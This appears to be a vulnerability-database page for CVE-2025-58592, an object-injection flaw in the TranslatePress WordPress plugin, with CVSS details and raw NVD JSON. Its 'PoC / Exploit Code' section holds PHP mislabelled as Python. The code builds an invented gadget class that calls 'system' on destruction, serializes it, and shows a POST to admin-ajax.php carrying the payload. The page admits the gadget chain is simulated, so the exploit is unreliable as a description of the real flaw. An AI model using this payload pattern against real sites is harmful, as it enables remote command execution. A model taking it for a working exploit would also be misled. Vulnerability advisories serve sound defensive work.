Security Vulnerability Report
中文
CVE-2025-58592 CVSS 8.1 HIGH

CVE-2025-58592

Published: 2025-11-06 16:15:59
Last Modified: 2026-04-15 00:35:42

Description

Deserialization of Untrusted Data vulnerability in Cozmoslabs TranslatePress translatepress-multilingual allows Object Injection.This issue affects TranslatePress: from n/a through <= 2.10.2.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

TranslatePress Multilingual <= 2.10.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-58592 PoC - TranslatePress Unserialize Vulnerability // This is a simulated PoC for educational purposes only // Gadget chain example using PHP magic methods class TranslatePressGadget { public $callback; public $args; function __construct() { // This simulates a gadget chain that could be exploited // In real scenario, this would use existing PHP classes } function __destruct() { if (isset($this->callback)) { call_user_func_array($this->callback, $this->args); } } } // Generate malicious payload $payload = new TranslatePressGadget(); $payload->callback = 'system'; // or 'exec', 'passthru', etc. $payload->args = ['id']; // Command to execute // Serialize the malicious object $exploit = serialize($payload); echo "Malicious Payload: " . $exploit . "\n"; echo "URL Encoded: " . urlencode($exploit) . "\n"; // Example HTTP Request: /* POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=trp_translate_string&translation[original_string]=[MALICIOUS_SERIALIZED_DATA] */ ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58592", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:59.080", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in Cozmoslabs TranslatePress translatepress-multilingual allows Object Injection.This issue affects TranslatePress: from n/a through <= 2.10.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/translatepress-multilingual/vulnerability/wordpress-translatepress-plugin-2-10-2-deserialization-of-untrusted-data-vulnerability?_s_id=cve", "source": "[email protected]"}]}}